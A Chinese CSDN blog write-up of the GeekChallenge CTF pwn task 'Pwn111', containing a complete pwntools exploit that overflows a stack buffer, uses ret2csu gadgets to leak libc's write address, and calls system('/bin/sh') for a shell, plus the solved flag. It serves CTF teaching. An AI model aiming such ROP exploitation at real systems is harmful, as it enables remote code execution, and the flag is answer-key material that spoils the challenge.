[GeekChallenge]Pwn Pwn111

最新推荐文章于 2023-02-13 16:51:28 发布
最新推荐文章于 2023-02-13 16:51:28 发布
阅读量181 收藏
点赞数
分类专栏: pwn CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nashi_Ko/article/details/109564735
版权
CTF 同时被 2 个专栏收录
13 篇文章 0 订阅
订阅专栏
pwn
7 篇文章 0 订阅
订阅专栏

[GeekChallenge]Pwn Pwn111

0x00 逆向分析

在这里插入图片描述
可以看到read 0x200字节,但是buf只有0x80字节,典型的栈溢出。
再看函数列表:在这里插入图片描述
有write read,典型的ret2csv题

0x01 脚本

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *

io = remote('81.69.0.47',1122)
elf = ELF('./pwn111')
libcfile = ELF('./libc')

pop_rdi = 0x401233
buff_size = 0x80
main = elf.sym['main']
read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
fakerbp = 'bi0xbi0x'
csu_end_addr = 0x40122A
csu_front_addr = 0x401210

def csu(rbx, rbp, r12, r13, r14, r15, last):
    # pop rbx,rbp,r12,r13,r14,r15
    # rbx should be 0,
    # rbp should be 1,enable not to jump
    # r15 should be the function we want to call
    # rdi=edi=r12d
    # rsi=r13
    # rdx=r14
    payload = 'a' * buff_size + fakerbp
    payload += p64(csu_end_addr) + p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
    payload += p64(csu_front_addr)
    payload += 'a' * 0x38
    payload += p64(last)
    io.send(payload)
    sleep(1)

print(io.recv())
csu(0,1,1,write_got,8,write_got,main)
real_write = u64(io.recv(8))
print(hex(real_write))

retn = 0x401234
libc_base = real_write - libcfile.sym['write']
binsh = libc_base + 0x18ce17 
system = libc_base + libcfile.sym['system']

def hackin():
    payload = 'a' * buff_size + fakerbp + p64(retn)
    payload += p64(pop_rdi) + p64(binsh) + p64(system)
    io.sendline(payload)

hackin()
io.interactive()
#脚本模板详见:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/medium-rop-zh/

csu函数主要作用为控制寄存器rdi,rsi,rdx(调用函数时前三个参数所在的寄存器)
使得控制write函数写出write函数在libc中真实地址,从而计算出libc的基地址libc_base。
有了基地址以后调用hackin()
hackin()主要作用是调用libc中的system和binsh实现获取shell

flag:SYC{C0n9r4tulat1on_Y0u_F1nd_how2Rop}

Nashi_Ko
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024NKCTF-pwn
03-25
2024NKCTF_pwn
pwn入门题目+exp
最新发布
01-26
初级的ROP,附有完整exp,可以学一下
CTF Geek Challenge——第十一届极客大挑战Pwm Write Up
无限迭代中......
11-18 406
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
GeekChallenge
自强不息
02-13 499
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Geek Challenge
m0_51376859的博客
01-07 388
Geek Challenge (dfs预处理) Description Geek Challenge [SKRZAT] is an old, old game from Poland that uses a game console with two buttons plus a joy stick. As is true to its name, the game communicates in binary, so that one button represents a zero and the o
CTF Geek Challenge——第十一届极客大挑战Misc Write Up
无限迭代中......
11-18 1008
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
2020第十一届极客大挑战——Geek Challenge部分wp
monster663的博客
10-26 4008
比赛正在进行中,本来只剩web没有AK,然后出了一波新题,先留一个坑,之后再填
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
PWN靶机环境 网络安全
05-23
PWN靶机环境
[2020 GeekChallenge] Re un_snake
Nashi_Ko的博客
11-18 214
[2020 GeekChallenge] Re un_snake 0x00 逆向 下载文件后,发现是pyc文件。 pyc文件可以使用uncompyle6库。题目告诉我们是3.8.5版本的python,因此我就给python3装了库。 pip3 install uncompyle6 注意我电脑装的是python2 python3共存,如果电脑只有python3的直接pip就行,不用pip3。 装完以后,去下载文件路径里,打开cmd,输入 uncompyle6 -o un_snake.cpython-38.p
[Geek Challenge 2022] crypto部分
weixin_52640415的博客
11-22 2889
极客 GeekChallenge 2022 CTF crypto
CTF Geek Challenge——第十一届极客大挑战Web Write Up
无限迭代中......
11-18 1215
比赛时间:2020年10月17日早上9点 比赛时限:一个月 0x1Welcome sha1绕过、php文件包含、一句话木马 Postman发送POST请求 sha1绕过 0x2flagshop md5碰撞 0x3朋友的学妹 源代码泄露 Base64在线加密、解密工具:http://tool.chinaz.com/Tools/Base64.aspx 0x4EZwww 后台扫描 后台扫描 ...
CTF Geek Challenge——第十一届极客大挑战Crypto Write Up
无限迭代中......
11-18 1077
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
BUUCTF刷题笔记 EasySQL 极客大挑战2019
m0_46576074的博客
05-14 154
[极客大挑战 2019]EasySQL 进入网页 使用万能密码admin’ or 1=1 #登入 得flag
记录最近做的一些web题目以及知识点(开个小坑到时候慢慢填)
Z745526156的博客
10-26 442
记录最近做的一些web题目以及知识点(开个小坑到时候慢慢填) GeekChallenge EZWWW 题目提示该题与文件备份有关,不知道咋搞先用dirsearch扫一扫 扫描语句 python dirsearch.py -u url -e * 从扫描结果可以发现存在一个www.zip 下载zip 解压后发现 flag.txt里面的是假flag 打开index.php <html> <head> <title>Lola's website1.0</t
极客大挑战php,BUUCTF-[极客大挑战 2019]PHP 1
weixin_33423874的博客
03-22 382
打开题目,我们就看到这个猫,先是用鼠标晃了晃,还跟着我的光标摇脑袋。我是来做题的。前端工程师肯定也对这个下功夫了。有一个良好的备份网站的习惯很好啊,我们首先根据题目的提示,用dirsearch扫目录如果没有这个工具的可以去github上下载就可以了。最终,我们扫到这个备份文件www.zip这个备份文件于是,我们直接回到网页,然后拼接www.zip于是我们就下载了源码,解压之后,我们看到了这些打开f...
BUUCTF web 极客大挑战 2019
菜的只能随便写写博客
04-01 1770
0x01 Secret File  在源码之中得到一个php页面  后面页面之中  根据提示抓包,在其中返回的页面得到了信息  得到源码,根据源码,发现存在文件包含漏洞  利用php伪协议,获取flag.php的信息,拿取flag payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php EasyS...
BUUCTF [极客大挑战 2019]EasySQL
m0_63253040的博客
03-10 144
一个登入页面,源代码没什么特殊的 ,直接万能密码登入就结束了,我还以为是sql注入... flag{77673d94-3104-472c-9e06-a20d9a3af51c}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值